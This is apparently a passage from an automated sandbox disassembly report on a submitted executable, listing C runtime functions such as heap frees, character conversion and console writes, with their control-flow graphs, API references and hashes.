                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92519071E642099FDB28CF64E8817EEBBF8FB58340F148029C501EB294D3749991DF90
                                                                                                                                                                                                                                                        Function 00911AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00911300), ref: 00911AB1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                        • Opcode ID: d6299068fc7eab0e908b61e53a655d5f7fccd1491cb1a625e361841c5748f143
                                                                                                                                                                                                                                                        • Instruction ID: a8844565931487fcd43ba9964c896b7cc217e62cbb77479149b1cbc2ec67e8d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6299068fc7eab0e908b61e53a655d5f7fccd1491cb1a625e361841c5748f143
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Function 00916893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: 46c4b8311298e9ad31078cd903f2b999b07574f92278cdd259266b666e52bf1a
                                                                                                                                                                                                                                                        • Instruction ID: d4ab1969beca9f6fb0193b2f9130f251f1693b739dd7299210ff6300265a5a48
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46c4b8311298e9ad31078cd903f2b999b07574f92278cdd259266b666e52bf1a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92A0243031C101FF5310CF305F4530C35DD55005C070340145005C0030D7304050FF03
                                                                                                                                                                                                                                                        Function 00916507 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 81 916507-91651b 82 916589-916591 81->82 83 91651d-916522 81->83 84 916593-916596 82->84 85 9165d8-9165f0 call 91667a 82->85 83->82 86 916524-916529 83->86 84->85 87 916598-9165d5 call 914869 * 4 84->87 94 9165f3-9165fa 85->94 86->82 89 91652b-91652e 86->89 87->85 89->82 92 916530-916538 89->92 95 916552-91655a 92->95 96 91653a-91653d 92->96 100 916619-91661d 94->100 101 9165fc-916600 94->101 98 916574-916588 call 914869 * 2 95->98 99 91655c-91655f 95->99 96->95 102 91653f-916551 call 914869 call 916078 96->102 98->82 99->98 107 916561-916573 call 914869 call 916176 99->107 108 916635-916641 100->108 109 91661f-916624 100->109 103 916602-916605 101->103 104 916616 101->104 102->95 103->104 111 916607-916615 call 914869 * 2 103->111 104->100 107->98 108->94 118 916643-916650 call 914869 108->118 115 916632 109->115 116 916626-916629 109->116 111->104 115->108 116->115 124 91662b-916631 call 914869 116->124 124->115
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0091654B
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916095
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160A7
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160B9
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160CB
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160DD
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160EF
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916101
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916113
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916125
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916137
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916149
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 0091615B
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 0091616D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916540
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916562
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916577
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916582
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165A4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165B7
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165C5
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165D0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916608
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091660F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091662C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916644
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                        • Opcode ID: b4a32328d041e44e5a5ad65e620a3e18ac17e6e1cb09633a14851169a79e4c96
                                                                                                                                                                                                                                                        • Instruction ID: 4a32c892f6fdc5fd2878a6cee0daed0cfa10fc862841bd5ab0a63571d7aadba3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a32328d041e44e5a5ad65e620a3e18ac17e6e1cb09633a14851169a79e4c96
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3314B71B003089FEB60AA7AE805BDA77EDAF84350F54456AF449DB191DE30EDC0CB50
                                                                                                                                                                                                                                                        Function 00914330 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 138 914330-914341 139 914343-91434c call 914869 138->139 140 91434d-9143d8 call 914869 * 9 call 9141f6 call 914246 138->140 139->140
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914344
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914350
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091435B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914366
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914371
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091437C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914387
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914392
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091439D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009143AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 89a9d37904c178c3016ac0b17b12012d0929f4b4b5824b7bf6f7f26a7e508882
                                                                                                                                                                                                                                                        • Instruction ID: 0ba7f0edf3469a6360402db8982827f0bd362ef1c2f1bd66cf240ab1fb299a78
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89a9d37904c178c3016ac0b17b12012d0929f4b4b5824b7bf6f7f26a7e508882
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011897670014CFFCB41EF96D942DD93BA5EF88750F5141A6B9084F162DA31DE919B80
                                                                                                                                                                                                                                                        Function 00917AB4 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 165 917ab4-917acd 166 917ae3-917ae8 165->166 167 917acf-917adf call 9182cc 165->167 169 917af5-917b19 MultiByteToWideChar 166->169 170 917aea-917af2 166->170 167->166 174 917ae1 167->174 172 917cac-917cbf call 91123a 169->172 173 917b1f-917b2b 169->173 170->169 175 917b2d-917b3e 173->175 176 917b7f 173->176 174->166 179 917b40-917b4f call 91ac20 175->179 180 917b5d-917b63 175->180 178 917b81-917b83 176->178 183 917ca1 178->183 184 917b89-917b9c MultiByteToWideChar 178->184 179->183 193 917b55-917b5b 179->193 182 917b64 call 9162ff 180->182 186 917b69-917b6e 182->186 188 917ca3-917caa call 91646a 183->188 184->183 187 917ba2-917bbd call 915a15 184->187 186->183 190 917b74 186->190 187->183 197 917bc3-917bca 187->197 188->172 194 917b7a-917b7d 190->194 193->194 194->178 198 917c04-917c10 197->198 199 917bcc-917bd1 197->199 200 917c12-917c23 198->200 201 917c5c 198->201 199->188 202 917bd7-917bd9 199->202 203 917c25-917c34 call 91ac20 200->203 204 917c3e-917c44 200->204 205 917c5e-917c60 201->205 202->183 206 917bdf-917bf9 call 915a15 202->206 210 917c9a-917ca0 call 91646a 203->210 219 917c36-917c3c 203->219 208 917c45 call 9162ff 204->208 209 917c62-917c7b call 915a15 205->209 205->210 206->188 218 917bff 206->218 214 917c4a-917c4f 208->214 209->210 222 917c7d-917c84 209->222 210->183 214->210 221 917c51 214->221 218->183 223 917c57-917c5a 219->223 221->223 224 917cc0-917cc6 222->224 225 917c86-917c87 222->225 223->205 226 917c88-917c98 WideCharToMultiByte 224->226 225->226 226->210 227 917cc8-917ccf call 91646a 226->227 227->188
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009154C8,00000000,?,?,?,00917D05,?,?,00000100), ref: 00917B0E
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00917B46
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00917D05,?,?,00000100,5EFC4D8B,?,?), ref: 00917B94
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00917C2B
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00917C8E
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917C9B
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917CA4
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917CC9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2597970681-0
                                                                                                                                                                                                                                                        • Opcode ID: 595ae6996d6feed35c125c4e1183201bf53dc3c732e3f66af79e5e75d4286911
                                                                                                                                                                                                                                                        • Instruction ID: 09f2bf89fc19bcb240c2f8b3a47ee795180b7f04cc0f815d44459f917a0b381b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 595ae6996d6feed35c125c4e1183201bf53dc3c732e3f66af79e5e75d4286911
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5519F7271421BABEB258EA4CC81FEBB7BAEB84750B154629FC44D6240EB74DCC0D690
                                                                                                                                                                                                                                                        Function 00918417 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 230 918417-918474 GetConsoleCP 231 9185b7-9185c9 call 91123a 230->231 232 91847a-918496 230->232 234 9184b1-9184c2 call 916052 232->234 235 918498-9184af 232->235 242 9184c4-9184c7 234->242 243 9184e8-9184ea 234->243 237 9184eb-9184fa call 9172b7 235->237 237->231 244 918500-918520 WideCharToMultiByte 237->244 245 9184cd-9184df call 9172b7 242->245 246 91858e-9185ad 242->246 243->237 244->231 247 918526-91853c WriteFile 244->247 245->231 252 9184e5-9184e6 245->252 246->231 249 9185af-9185b5 GetLastError 247->249 250 91853e-91854f 247->250 249->231 250->231 253 918551-918555 250->253 252->244 254 918583-918586 253->254 255 918557-918575 WriteFile 253->255 254->232 257 91858c 254->257 255->249 256 918577-91857b 255->256 256->231 258 91857d-918580 256->258 257->231 258->254
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00918B8C,?,00000000,?,00000000,00000000), ref: 00918459
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 009184D4
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 009184EF
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00918515
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00918B8C,00000000,?,?,?,?,?,?,?,?,?,00918B8C,?), ref: 00918534
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00918B8C,00000000,?,?,?,?,?,?,?,?,?,00918B8C,?), ref: 0091856D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                        • Opcode ID: ddc6da42ad786d398b89f783312a409fd68bfaea4121c059c61fb7e77bc32d4e
                                                                                                                                                                                                                                                        • Instruction ID: 8d1b11a90e3ffc06dea94e6e6cb4deb41623661dd37cc08a7f36ba64609d56ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddc6da42ad786d398b89f783312a409fd68bfaea4121c059c61fb7e77bc32d4e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5151A271F002499FDB10CFA8D885AEEBBFAEF19300F18455AF955E7291DB309981DB60
                                                                                                                                                                                                                                                        Function 00911E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 259 911e00-911e51 call 91ac80 call 911dc0 call 912377 266 911e53-911e65 259->266 267 911ead-911eb0 259->267 268 911ed0-911ed9 266->268 270 911e67-911e7e 266->270 267->268 269 911eb2-911ebf call 912360 267->269 274 911ec4-911ecd call 911dc0 269->274 272 911e80-911e8e call 912300 270->272 273 911e94 270->273 282 911e90 272->282 283 911ea4-911eab 272->283 276 911e97-911e9c 273->276 274->268 276->270 279 911e9e-911ea0 276->279 279->268 280 911ea2 279->280 280->274 284 911e92 282->284 285 911eda-911ee3 282->285 283->274 284->276 286 911ee5-911eec 285->286 287 911f1d-911f2d call 912340 285->287 286->287 289 911eee-911efd call 91aac0 286->289 292 911f41-911f5d call 911dc0 call 912320 287->292 293 911f2f-911f3e call 912360 287->293 297 911f1a 289->297 298 911eff-911f17 289->298 293->292 297->287 298->297
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911E37
                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00911E3F
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911EC8
                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00911EF3
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911F48
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 353a03c234ad18035a62a9a8fc4a73072832ad28ad23c5f8771ecb6a751af684
                                                                                                                                                                                                                                                        • Instruction ID: 4262a7fb33e6ecdba311ca44932ceefbc6d7bc0c702d850ccfe917e14c1923f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353a03c234ad18035a62a9a8fc4a73072832ad28ad23c5f8771ecb6a751af684
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0419234B0020CABCF10DF68C885BDEBBB5BF85364F148055ED159B392D7359A96CB91
                                                                                                                                                                                                                                                        Function 0091621B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 305 91621b-916226 306 9162fc-9162fe 305->306 307 91622c-9162f9 call 9161df * 5 call 914869 * 3 call 9161df * 5 call 914869 * 4 305->307 307->306
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 009161DF: _free.LIBCMT ref: 00916208
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916269
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916274
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091627F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162D3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162DE
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162E9
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162F4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                        • Instruction ID: 3b2371c9ba71f767ff985245a2db402f9627eab9bf6f9a2779fba44b3e438c91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26112171B44B5CBAD560B7B5CC0BFCB779C5F84700F804825B69AAA093DA75BA844650
                                                                                                                                                                                                                                                        Function 009123D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 342 9123d1-9123d8 343 9123da-9123dc 342->343 344 9123dd-9123f8 GetLastError call 9126a4 342->344 347 912411-912413 344->347 348 9123fa-9123fc 344->348 349 912457-912462 SetLastError 347->349 348->349 350 9123fe-91240f call 9126df 348->350 350->347 353 912415-912425 call 913f67 350->353 356 912427-912437 call 9126df 353->356 357 912439-912449 call 9126df 353->357 356->357 362 91244b-91244d 356->362 363 91244f-912456 call 913ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,009123C8,0091209F,00911AFC), ref: 009123DF
                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009123ED
                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00912406
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,009123C8,0091209F,00911AFC), ref: 00912458
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
